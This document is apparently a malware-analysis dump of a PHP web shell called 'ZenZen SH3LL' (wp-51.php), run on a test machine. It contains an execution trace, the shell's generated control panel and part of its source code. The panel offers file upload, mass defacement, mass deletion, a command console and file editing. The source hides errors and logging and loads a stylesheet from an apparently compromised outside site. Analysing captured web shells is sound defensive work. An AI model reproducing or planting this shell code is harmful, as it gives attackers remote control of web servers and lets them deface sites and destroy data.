2 125 0 0.152465 565536 is_dir 0 /var/www/html/uploads/wp-51.php 555 1 '/var/www/html/uploads/prepend.php'
2 125 1 0.152478 565576
2 125 R FALSE
2 126 0 0.152491 565528 filemtime 0 /var/www/html/uploads/wp-51.php 542 1 '/var/www/html/uploads/wp-51.php'
2 126 1 0.152506 565560
2 126 R 1676242884
2 127 0 0.152518 565464 date 0 /var/www/html/uploads/wp-51.php 542 2 'Y-m-d H:i:s' 1676242884
2 127 1 0.152548 565792
2 127 R '2023-02-12 18:01:24'
1 A /var/www/html/uploads/wp-51.php 542 $dt = '2023-02-12 18:01:24'
2 128 0 0.152572 565464 function_exists 0 /var/www/html/uploads/wp-51.php 543 1 'posix_getpwuid'
2 128 1 0.152585 565504
2 128 R TRUE
2 129 0 0.152597 565520 fileowner 0 /var/www/html/uploads/wp-51.php 544 1 '/var/www/html/uploads/wp-51.php'
2 129 1 0.152610 565560
2 129 R 1000
2 130 0 0.152621 565464 posix_getpwuid 0 /var/www/html/uploads/wp-51.php 544 1 1000
2 130 1 0.152650 566280
2 130 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 544 $downer = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 545 $downer = 'osboxes'
2 131 0 0.152701 565464 function_exists 0 /var/www/html/uploads/wp-51.php 549 1 'posix_getgrgid'
2 131 1 0.152714 565504
2 131 R TRUE
2 132 0 0.152726 565520 filegroup 0 /var/www/html/uploads/wp-51.php 550 1 '/var/www/html/uploads/wp-51.php'
2 132 1 0.152739 565560
2 132 R 1000
2 133 0 0.152750 565464 posix_getgrgid 0 /var/www/html/uploads/wp-51.php 550 1 1000
2 133 1 0.152780 566120
2 133 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
1 A /var/www/html/uploads/wp-51.php 550 $dgrp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
1 A /var/www/html/uploads/wp-51.php 551 $dgrp = 'osboxes'
2 134 0 0.152823 565520 is_dir 0 /var/www/html/uploads/wp-51.php 555 1 '/var/www/html/uploads/wp-51.php'
2 134 1 0.152836 565560
2 134 R FALSE
2 135 0 0.152849 565512 filemtime 0 /var/www/html/uploads/wp-51.php 582 1 '/var/www/html/uploads/.'
2 135 1 0.152864 565544
2 135 R 1676242884
2 136 0 0.152876 565456 date 0 /var/www/html/uploads/wp-51.php 582 2 'Y-m-d H:i:s' 1676242884
2 136 1 0.152907 565784
2 136 R '2023-02-12 18:01:24'
1 A /var/www/html/uploads/wp-51.php 582 $ft = '2023-02-12 18:01:24'
2 137 0 0.152931 565760 is_file 0 /var/www/html/uploads/wp-51.php 583 1 '/var/www/html/uploads/.'
2 137 1 0.152944 565800
2 137 R FALSE
2 138 0 0.152957 565768 filemtime 0 /var/www/html/uploads/wp-51.php 582 1 '/var/www/html/uploads/..'
2 138 1 0.152971 565816
2 138 R 1676242884
2 139 0 0.152983 565720 date 0 /var/www/html/uploads/wp-51.php 582 2 'Y-m-d H:i:s' 1676242884
2 139 1 0.153013 566048
2 139 R '2023-02-12 18:01:24'
1 A /var/www/html/uploads/wp-51.php 582 $ft = '2023-02-12 18:01:24'
2 140 0 0.153039 565776 is_file 0 /var/www/html/uploads/wp-51.php 583 1 '/var/www/html/uploads/..'
2 140 1 0.153051 565816
2 140 R FALSE
2 141 0 0.153064 565776 filemtime 0 /var/www/html/uploads/wp-51.php 582 1 '/var/www/html/uploads/.htaccess'
2 141 1 0.153078 565816
2 141 R 1676242884
2 142 0 0.153091 565720 date 0 /var/www/html/uploads/wp-51.php 582 2 'Y-m-d H:i:s' 1676242884
2 142 1 0.153120 566048
2 142 R '2023-02-12 18:01:24'
1 A /var/www/html/uploads/wp-51.php 582 $ft = '2023-02-12 18:01:24'
2 143 0 0.153143 565776 is_file 0 /var/www/html/uploads/wp-51.php 583 1 '/var/www/html/uploads/.htaccess'
2 143 1 0.153156 565816
2 143 R TRUE
2 144 0 0.153168 565720 function_exists 0 /var/www/html/uploads/wp-51.php 584 1 'posix_getpwuid'
2 144 1 0.153181 565760
2 144 R TRUE
2 145 0 0.153194 565776 fileowner 0 /var/www/html/uploads/wp-51.php 585 1 '/var/www/html/uploads/.htaccess'
2 145 1 0.153206 565816
2 145 R 0
2 146 0 0.153218 565720 posix_getpwuid 0 /var/www/html/uploads/wp-51.php 585 1 0
2 146 1 0.153239 566520
2 146 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 585 $fowner = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 586 $fowner = 'root'
2 147 0 0.153289 565752 function_exists 0 /var/www/html/uploads/wp-51.php 590 1 'posix_getgrgid'
2 147 1 0.153302 565792
2 147 R TRUE
2 148 0 0.153315 565808 filegroup 0 /var/www/html/uploads/wp-51.php 591 1 '/var/www/html/uploads/.htaccess'
2 148 1 0.153327 565848
2 148 R 0
2 149 0 0.153339 565752 posix_getgrgid 0 /var/www/html/uploads/wp-51.php 591 1 0
2 149 1 0.153360 566408
2 149 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/wp-51.php 591 $fgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/wp-51.php 592 $fgrp = 'root'
2 150 0 0.153430 566104 filesize 0 /var/www/html/uploads/wp-51.php 600 1 '.htaccess'
2 150 1 0.153445 566128
2 150 R 64
2 151 0 0.153471 566088 sz 1 /var/www/html/uploads/wp-51.php 600 1 64
2 A /var/www/html/uploads/wp-51.php 40 $sz = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2 A /var/www/html/uploads/wp-51.php 41 $i = 0
3 152 0 0.153506 566088 round 0 /var/www/html/uploads/wp-51.php 42 2 64 2
3 152 1 0.153519 566160
3 152 R 64
2 151 1 0.153534 566120
2 151 R '64 B'
2 153 0 0.153582 565824 is_writable 0 /var/www/html/uploads/wp-51.php 603 1 '/var/www/html/uploads/.htaccess'
2 153 1 0.153602 565864
2 153 R FALSE
2 154 0 0.153616 565824 is_readable 0 /var/www/html/uploads/wp-51.php 604 1 '/var/www/html/uploads/.htaccess'
2 154 1 0.153644 565864
2 154 R TRUE
2 155 0 0.153657 565824 p 1 /var/www/html/uploads/wp-51.php 605 1 '/var/www/html/uploads/.htaccess'
3 156 0 0.153669 565824 fileperms 0 /var/www/html/uploads/wp-51.php 63 1 '/var/www/html/uploads/.htaccess'
3 156 1 0.153683 565880
3 156 R 33188
2 A /var/www/html/uploads/wp-51.php 63 $p = 33188
2 A /var/www/html/uploads/wp-51.php 64 $i = 'u'
2 A /var/www/html/uploads/wp-51.php 67 $i = '-'
2 A /var/www/html/uploads/wp-51.php 72 $i .= 'r'
2 A /var/www/html/uploads/wp-51.php 73 $i .= 'w'
2 A /var/www/html/uploads/wp-51.php 74 $i .= '-'
2 A /var/www/html/uploads/wp-51.php 75 $i .= 'r'
2 A /var/www/html/uploads/wp-51.php 76 $i .= '-'
2 A /var/www/html/uploads/wp-51.php 77 $i .= '-'
2 A /var/www/html/uploads/wp-51.php 78 $i .= 'r'
2 A /var/www/html/uploads/wp-51.php 79 $i .= '-'
2 A /var/www/html/uploads/wp-51.php 80 $i .= '-'
2 155 1 0.153806 565880
2 155 R '-rw-r--r--'
2 157 0 0.153820 565840 is_writable 0 /var/www/html/uploads/wp-51.php 606 1 '/var/www/html/uploads/.htaccess'
2 157 1 0.153835 565880
2 157 R FALSE
2 158 0 0.153848 565840 is_readable 0 /var/www/html/uploads/wp-51.php 606 1 '/var/www/html/uploads/.htaccess'
2 158 1 0.153863 565880
2 158 R TRUE
2 159 0 0.153881 565840 filemtime 0 /var/www/html/uploads/wp-51.php 582 1 '/var/www/html/uploads/data'
2 159 1 0.153895 565880
2 159 R 1676242884
2 160 0 0.153908 565784 date 0 /var/www/html/uploads/wp-51.php 582 2 'Y-m-d H:i:s' 1676242884
2 160 1 0.153939 566112
2 160 R '2023-02-12 18:01:24'
1 A /var/www/html/uploads/wp-51.php 582 $ft = '2023-02-12 18:01:24'
2 161 0 0.153963 565840 is_file 0 /var/www/html/uploads/wp-51.php 583 1 '/var/www/html/uploads/data'
2 161 1 0.153975 565880
2 161 R FALSE
2 162 0 0.153988 565848 filemtime 0 /var/www/html/uploads/wp-51.php 582 1 '/var/www/html/uploads/prepend.php'
2 162 1 0.154003 565896
2 162 R 1676242884
2 163 0 0.154016 565792 date 0 /var/www/html/uploads/wp-51.php 582 2 'Y-m-d H:i:s' 1676242884
2 163 1 0.154045 566120
2 163 R '2023-02-12 18:01:24'
1 A /var/www/html/uploads/wp-51.php 582 $ft = '2023-02-12 18:01:24'
2 164 0 0.154069 565856 is_file 0 /var/www/html/uploads/wp-51.php 583 1 '/var/www/html/uploads/prepend.php'
2 164 1 0.154082 565896
2 164 R TRUE
2 165 0 0.154094 565792 function_exists 0 /var/www/html/uploads/wp-51.php 584 1 'posix_getpwuid'
2 165 1 0.154107 565832
2 165 R TRUE
2 166 0 0.154119 565856 fileowner 0 /var/www/html/uploads/wp-51.php 585 1 '/var/www/html/uploads/prepend.php'
2 166 1 0.154132 565896
2 166 R 0
2 167 0 0.154144 565792 posix_getpwuid 0 /var/www/html/uploads/wp-51.php 585 1 0
2 167 1 0.154168 566592
2 167 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 585 $fowner = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 586 $fowner = 'root'
2 168 0 0.154218 565792 function_exists 0 /var/www/html/uploads/wp-51.php 590 1 'posix_getgrgid'
2 168 1 0.154231 565832
2 168 R TRUE
2 169 0 0.154243 565856 filegroup 0 /var/www/html/uploads/wp-51.php 591 1 '/var/www/html/uploads/prepend.php'
2 169 1 0.154256 565896
2 169 R 0
2 170 0 0.154268 565792 posix_getgrgid 0 /var/www/html/uploads/wp-51.php 591 1 0
2 170 1 0.154288 566448
2 170 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/wp-51.php 591 $fgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/wp-51.php 592 $fgrp = 'root'
2 171 0 0.154332 566112 filesize 0 /var/www/html/uploads/wp-51.php 600 1 'prepend.php'
2 171 1 0.154346 566128
2 171 R 57
2 172 0 0.154359 566088 sz 1 /var/www/html/uploads/wp-51.php 600 1 57
2 A /var/www/html/uploads/wp-51.php 40 $sz = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2 A /var/www/html/uploads/wp-51.php 41 $i = 0
3 173 0 0.154393 566088 round 0 /var/www/html/uploads/wp-51.php 42 2 57 2
3 173 1 0.154405 566160
3 173 R 57
2 172 1 0.154419 566120
2 172 R '57 B'
2 174 0 0.154433 565832 is_writable 0 /var/www/html/uploads/wp-51.php 603 1 '/var/www/html/uploads/prepend.php'
2 174 1 0.154448 565872
2 174 R FALSE
2 175 0 0.154461 565832 is_readable 0 /var/www/html/uploads/wp-51.php 604 1 '/var/www/html/uploads/prepend.php'
2 175 1 0.154475 565872
2 175 R TRUE
2 176 0 0.154488 565832 p 1 /var/www/html/uploads/wp-51.php 605 1 '/var/www/html/uploads/prepend.php'
3 177 0 0.154501 565832 fileperms 0 /var/www/html/uploads/wp-51.php 63 1 '/var/www/html/uploads/prepend.php'
3 177 1 0.154515 565896
3 177 R 33261
2 A /var/www/html/uploads/wp-51.php 63 $p = 33261
2 A /var/www/html/uploads/wp-51.php 64 $i = 'u'
2 A /var/www/html/uploads/wp-51.php 67 $i = '-'
2 A /var/www/html/uploads/wp-51.php 72 $i .= 'r'
2 A /var/www/html/uploads/wp-51.php 73 $i .= 'w'
2 A /var/www/html/uploads/wp-51.php 74 $i .= 'x'
2 A /var/www/html/uploads/wp-51.php 75 $i .= 'r'
2 A /var/www/html/uploads/wp-51.php 76 $i .= '-'
2 A /var/www/html/uploads/wp-51.php 77 $i .= 'x'
2 A /var/www/html/uploads/wp-51.php 78 $i .= 'r'
2 A /var/www/html/uploads/wp-51.php 79 $i .= '-'
2 A /var/www/html/uploads/wp-51.php 80 $i .= 'x'
2 176 1 0.154640 565896
2 176 R '-rwxr-xr-x'
2 178 0 0.154655 565856 is_writable 0 /var/www/html/uploads/wp-51.php 606 1 '/var/www/html/uploads/prepend.php'
2 178 1 0.154670 565896
2 178 R FALSE
2 179 0 0.154683 565856 is_readable 0 /var/www/html/uploads/wp-51.php 606 1 '/var/www/html/uploads/prepend.php'
2 179 1 0.154698 565896
2 179 R TRUE
2 180 0 0.154711 565848 filemtime 0 /var/www/html/uploads/wp-51.php 582 1 '/var/www/html/uploads/wp-51.php'
2 180 1 0.154726 565880
2 180 R 1676242884
2 181 0 0.154738 565784 date 0 /var/www/html/uploads/wp-51.php 582 2 'Y-m-d H:i:s' 1676242884
2 181 1 0.154768 566112
2 181 R '2023-02-12 18:01:24'
1 A /var/www/html/uploads/wp-51.php 582 $ft = '2023-02-12 18:01:24'
2 182 0 0.154792 565840 is_file 0 /var/www/html/uploads/wp-51.php 583 1 '/var/www/html/uploads/wp-51.php'
2 182 1 0.154805 565880
2 182 R TRUE
2 183 0 0.154817 565784 function_exists 0 /var/www/html/uploads/wp-51.php 584 1 'posix_getpwuid'
2 183 1 0.154830 565824
2 183 R TRUE
2 184 0 0.154843 565840 fileowner 0 /var/www/html/uploads/wp-51.php 585 1 '/var/www/html/uploads/wp-51.php'
2 184 1 0.154855 565880
2 184 R 1000
2 185 0 0.154867 565784 posix_getpwuid 0 /var/www/html/uploads/wp-51.php 585 1 1000
2 185 1 0.154896 566600
2 185 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 585 $fowner = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 586 $fowner = 'osboxes'
2 186 0 0.154948 565784 function_exists 0 /var/www/html/uploads/wp-51.php 590 1 'posix_getgrgid'
2 186 1 0.154961 565824
2 186 R TRUE
2 187 0 0.154974 565840 filegroup 0 /var/www/html/uploads/wp-51.php 591 1 '/var/www/html/uploads/wp-51.php'
2 187 1 0.154986 565880
2 187 R 1000
2 188 0 0.154998 565784 posix_getgrgid 0 /var/www/html/uploads/wp-51.php 591 1 1000
2 188 1 0.155028 566440
2 188 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
1 A /var/www/html/uploads/wp-51.php 591 $fgrp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
1 A /var/www/html/uploads/wp-51.php 592 $fgrp = 'osboxes'
2 189 0 0.155072 566104 filesize 0 /var/www/html/uploads/wp-51.php 600 1 'wp-51.php'
2 189 1 0.155087 566128
2 189 R 24432
2 190 0 0.155099 566088 sz 1 /var/www/html/uploads/wp-51.php 600 1 24432
2 A /var/www/html/uploads/wp-51.php 40 $sz = [0 => 'B', 1 => 'KB', 2 => 'MB', 3 => 'GB', 4 => 'TB']
2 A /var/www/html/uploads/wp-51.php 41 $i = 0
2 A /var/www/html/uploads/wp-51.php 41 $byt /= 1024
2 A /var/www/html/uploads/wp-51.php 41 $i++
3 191 0 0.155154 566088 round 0 /var/www/html/uploads/wp-51.php 42 2 23.859375 2
3 191 1 0.155167 566160
3 191 R 23.86
2 190 1 0.155182 566128
2 190 R '23.86 KB'
2 192 0 0.155196 565824 is_writable 0 /var/www/html/uploads/wp-51.php 603 1 '/var/www/html/uploads/wp-51.php'
2 192 1 0.155211 565864
2 192 R FALSE
2 193 0 0.155223 565824 is_readable 0 /var/www/html/uploads/wp-51.php 604 1 '/var/www/html/uploads/wp-51.php'
2 193 1 0.155238 565864
2 193 R TRUE
2 194 0 0.155250 565824 p 1 /var/www/html/uploads/wp-51.php 605 1 '/var/www/html/uploads/wp-51.php'
3 195 0 0.155262 565824 fileperms 0 /var/www/html/uploads/wp-51.php 63 1 '/var/www/html/uploads/wp-51.php'
3 195 1 0.155276 565880
3 195 R 33204
2 A /var/www/html/uploads/wp-51.php 63 $p = 33204
2 A /var/www/html/uploads/wp-51.php 64 $i = 'u'
2 A /var/www/html/uploads/wp-51.php 67 $i = '-'
2 A /var/www/html/uploads/wp-51.php 72 $i .= 'r'
2 A /var/www/html/uploads/wp-51.php 73 $i .= 'w'
2 A /var/www/html/uploads/wp-51.php 74 $i .= '-'
2 A /var/www/html/uploads/wp-51.php 75 $i .= 'r'
2 A /var/www/html/uploads/wp-51.php 76 $i .= 'w'
2 A /var/www/html/uploads/wp-51.php 77 $i .= '-'
2 A /var/www/html/uploads/wp-51.php 78 $i .= 'r'
2 A /var/www/html/uploads/wp-51.php 79 $i .= '-'
2 A /var/www/html/uploads/wp-51.php 80 $i .= '-'
2 194 1 0.155396 565880
2 194 R '-rw-rw-r--'
2 196 0 0.155416 565840 is_writable 0 /var/www/html/uploads/wp-51.php 606 1 '/var/www/html/uploads/wp-51.php'
2 196 1 0.155430 565880
2 196 R FALSE
2 197 0 0.155443 565840 is_readable 0 /var/www/html/uploads/wp-51.php 606 1 '/var/www/html/uploads/wp-51.php'
2 197 1 0.155457 565880
2 197 R TRUE
2 198 0 0.155613 565784 date 0 /var/www/html/uploads/wp-51.php 629 1 'Y'
2 198 1 0.155643 566072
2 198 R '2023'
1 3 1 0.155661 565784
0.155706 383680
TRACE END [2023-02-12 21:01:50.585874]
Generated HTML code
<html><head>
<meta name="author" content="🆂🅷🅴🅻🅻🆉🅾🅽🅴 ⑤① ">
<meta name="robots" content="noindex,nofollow">
<title>localhost - 🆂🅷🅴🅻🅻🆉🅾🅽🅴 ⑤① </title>
<meta name="viewport" content="width=device-width, initial-scale=0.70">
<link rel="stylesheet" href="//feb.ulb.ac.id/wp-admin/css/fax.css">
<script src="//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js"></script>
<script src="//cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js"></script>
<script src="//code.jquery.com/jquery-3.3.1.slim.min.js"></script>
</head>
<body class="bg-secondary text-light">
<div class="container-fluid">
<div class="py-3" id="main">
<div class="box shadow bg-dark p-4 rounded-3">
<div class="corner text-secondary anu">🄽🄾🅃🄴 :̶ I̶f̶ y̶o̶u̶ u̶s̶e̶ t̶h̶i̶s̶ s̶h̶e̶l̶l̶,̶ t̶h̶e̶n̶ y̶o̶u̶ d̶o̶ w̶h̶a̶t̶ y̶o̶u̶ d̶o̶.̶ A̶n̶d̶ Z̶e̶n̶Z̶e̶n̶ h̶a̶s̶ n̶o̶t̶h̶i̶n̶g̶ t̶o̶ d̶o̶ w̶i̶t̶h̶ i̶t̶.̶</div>
<a class="text-decoration-none text-light anu" href="/wp-51.php"><h4>🆂🅷🅴🅻🅻🆉🅾🅽🅴 ⑤① 🄱🅈 🅉🄴🄽🅉🄴🄽</h4></a><div class="table-responsive"><i class="bi bi-hdd-rack"></i> : <a class="text-decoration-none text-light" href="?path=/">/</a><a class="text-decoration-none" href="?path=/var">var</a>/<a class="text-decoration-none" href="?path=/var/www">www</a>/<a class="text-decoration-none" href="?path=/var/www/html">html</a>/ [ <gr class="anu">drwxrwxrwx</gr> ]</div>
</div>
</div>
</div>
<div class="container-fluid">
<div class="box shadow bg-dark p-4 rounded-3">
<div class="corner anu">
<b data-bs-toggle="collapse" data-bs-target="#collapseExample" aria-expanded="false" aria-controls="collapseExample"><i class="bi bi-info-circle"></i> info server <i class="bi bi-chevron-down"></i></b>
</div>
<div class="collapse text-dark mb-3" id="collapseExample">
<div class="box shadow bg-light p-4 rounded-3">
Uname: <gr>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</gr><br>
Software: <gr>Apache/2.4.52 (Ubuntu)</gr><br>
PHP version: <gr>7.2.34-37+ubuntu22.04.1+deb.sury.org+1</gr> <a class="text-decoration-none" href="?phpinfo&path=/var/www/html">[ PHP INFO ]</a> PHP os: <gr>Linux</gr><br>
Server Ip: <gr>127.0.0.1</gr><br>
Your Ip: <gr>::1</gr><br>
User: <gr>www-data</gr> (33) | Group: <gr>www-data</gr> (33)<br>
Safe Mode: <gr>OFF</gr><br>
Disable Function:<div class="table-responsive"><rd>pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,</rd></div>
</div>
</div>
<div class="text-center">
<div class="btn-group">
<a class="btn btn-outline-light btn-sm" href="?upload&path=/var/www/html"><i class="bi bi-upload"></i> 🅄🄿🄻🄾🄰🄳</a>
<a class="btn btn-outline-light btn-sm" href="?mass_deface&path=/var/www/html"><i class="bi bi-exclamation-diamond"></i> 🄼🄰🅂🅂 🄳🄴🄵🄰🄲🄴</a>
<a class="btn btn-outline-light btn-sm" href="?mass_delete&path=/var/www/html"><i class="bi bi-trash"></i> 🄼🄰🅂🅂 🄳🄴🄻🄴🅃🄴</a>
<a class="btn btn-outline-light btn-sm" href="?cmd&path=/var/www/html"><i class="bi bi-terminal"></i> 🄲🄾🄽🅂🄾🄻🄴</a>
</div>
</div>
<div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td class="text-center">name</td>
<td class="text-center">last edit</td>
<td class="text-center">size</td>
<td class="text-center">owner<gr>:</gr>downer</td>
<td class="text-center">permission</td>
<td class="text-center">options</td>
</tr>
</thead>
<tbody class="text-nowrap">
<tr>
<td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?path=/var/www">..</a></td><td></td><td></td><td></td><td></td><td class="text-center">
<div class="btn-group">
<a class="btn btn-outline-light btn-sm" href="?filebaru&path=/var/www/html"><i class="bi bi-file-earmark-plus-fill"></i></a>
<a class="btn btn-outline-light btn-sm" href="?dirbaru&path=/var/www/html"><i class="bi bi-folder-plus"></i></a>
</div>
</td>
</tr>
<tr>
<td><i class="bi bi-file-earmark-code-fill"></i><a class="text-decoration-none text-secondary" href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td>
<td class="text-center">2023-02-12 18:01:16</td>
<td class="text-center">0 B</td>
<td class="text-center">root<gr>:</gr>root</td>
<td class="text-center">-rw-r--r--
</td><td class="text-center">
<form method="POST" action="?option&path=/var/www/html">
<div class="btn-group">
<button class="btn btn-outline-light btn-sm" name="opt" value="edit"><i class="bi bi-pencil-square"></i></button>
<button class="btn btn-outline-light btn-sm" name="opt" value="ganti_nama"><i class="bi bi-pencil-fill"></i></button>
<button class="btn btn-outline-light btn-sm" name="opt" value="download"><i class="bi bi-download"></i></button>
<button class="btn btn-outline-light btn-sm" name="opt" value="hapus"><i class="bi bi-trash-fill"></i></button>
</div>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
</form>
</td>
</tr>
<tr>
<td><i class="bi bi-file-earmark-code-fill"></i><a class="text-decoration-none text-secondary" href="?filesrc=/var/www/html/wp-51.php&path=/var/www/html">wp-51.php</a></td>
<td class="text-center">2023-02-12 18:01:16</td>
<td class="text-center">23.86 KB</td>
<td class="text-center">osboxes<gr>:</gr>osboxes</td>
<td class="text-center">-rw-rw-r--
</td><td class="text-center">
<form method="POST" action="?option&path=/var/www/html">
<div class="btn-group">
<button class="btn btn-outline-light btn-sm" name="opt" value="edit"><i class="bi bi-pencil-square"></i></button>
<button class="btn btn-outline-light btn-sm" name="opt" value="ganti_nama"><i class="bi bi-pencil-fill"></i></button>
<button class="btn btn-outline-light btn-sm" name="opt" value="download"><i class="bi bi-download"></i></button>
<button class="btn btn-outline-light btn-sm" name="opt" value="hapus"><i class="bi bi-trash-fill"></i></button>
</div>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="wp-51.php">
<input type="hidden" name="path" value="/var/www/html/wp-51.php">
</form>
</td>
</tr></tbody>
</table>
<div class="text-secondary">© 2023 🆂🅷🅴🅻🅻🆉🅾🅽🅴 ⑤① </div>
</div>
</div></div></body></html>Original PHP code
<?php
/* ZenZen 2022 SH3LL */
set_time_limit(0);
error_reporting(0);
@ini_set('error_log',null);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
date_default_timezone_set('Asia/Malaysia');
$_n = '🆂🅷🅴🅻🅻🆉🅾🅽🅴 ⑤① ';
$_s = "<style>table{display:none;}</style><div class='table-responsive'><hr></div>";
$_r = "required='required'";
$_x = "<i class='bi bi-menu-up'></i>";
if(isset($_GET['option']) && $_POST['opt'] == 'download'){
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="'.$_POST['name'].'"');
echo(file_get_contents($_POST['path']));
exit();
}
function тЦЯ($path,$p) {
if(isset($_GET['path'])) {
$тЦЪ = $_GET['path'];
} else {
$тЦЪ = getcwd();
}
if(is_writable($тЦЪ)) {
return "<gr class='anu'>".$p."</gr>";
} else {
return "<rd class='anu'>".$p."</rd>";
}
}
function ok(){
echo '<div class="alert alert-success alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>';
}
function er(){
echo '<div class="alert alert-danger alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>';
}
function sz($byt){
$sz = array('B','KB','MB','GB','TB');
for($i = 0; $byt >= 1024 && $i < (count($sz) -1 ); $byt /= 1024, $i++ );
return(round($byt,2)." ".$sz[$i]);
}
function ip() {
$ipas = '';
if(getenv('HTTP_CLIENT_IP'))
$ipas = getenv('HTTP_CLIENT_IP');
else if(getenv('HTTP_X_FORWARDED_FOR'))
$ipas = getenv('HTTP_X_FORWARDED_FOR');
else if(getenv('HTTP_X_FORWARDED'))
$ipas = getenv('HTTP_X_FORWARDED');
else if(getenv('HTTP_FORWARDED_FOR'))
$ipas = getenv('HTTP_FORWARDED_FOR');
else if(getenv('HTTP_FORWARDED'))
$ipas = getenv('HTTP_FORWARDED');
else if(getenv('REMOTE_ADDR'))
$ipas = getenv('REMOTE_ADDR');
else
$ipas = 'IP tidak dikenali';
return $ipas;
}
function p($file){
if($p = @fileperms($file)){
$i = 'u';
if(($p & 0xC000) == 0xC000)$i = 's';
elseif(($p & 0xA000) == 0xA000)$i = 'l';
elseif(($p & 0x8000) == 0x8000)$i = '-';
elseif(($p & 0x6000) == 0x6000)$i = 'b';
elseif(($p & 0x4000) == 0x4000)$i = 'd';
elseif(($p & 0x2000) == 0x2000)$i = 'c';
elseif(($p & 0x1000) == 0x1000)$i = 'p';
$i .= ($p & 00400)? 'r':'-';
$i .= ($p & 00200)? 'w':'-';
$i .= ($p & 00100)? 'x':'-';
$i .= ($p & 00040)? 'r':'-';
$i .= ($p & 00020)? 'w':'-';
$i .= ($p & 00010)? 'x':'-';
$i .= ($p & 00004)? 'r':'-';
$i .= ($p & 00002)? 'w':'-';
$i .= ($p & 00001)? 'x':'-';
return $i;
}
else return "- ?? -";
}
$disfunc = @ini_get("disable_functions");
if(empty($disfunc)) {
$disfc = "<gr>NONE</gr>";
} else {
$disfc = "<rd>$disfunc</rd>";
}
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<rd>ON</rd>" : "<gr>OFF</gr>";
$i1i='========================================================================
Obfuscation provided by Unknowndevice64 - Free Online PHP Obfuscator
http://www.ud64.com/
==============================================================================';
echo "
<!DOCTYPE HTML>
<html>
<head>
<meta name='author' content='$_n'>
<meta name='robots' content='noindex,nofollow'>
<title>".$_SERVER['HTTP_HOST']." - $_n</title>
<meta name='viewport' content='width=device-width, initial-scale=0.70'>
<link rel='stylesheet' href='//feb.ulb.ac.id/wp-admin/css/fax.css'>
<script src='//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js'></script>
<script src='//cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js'></script>
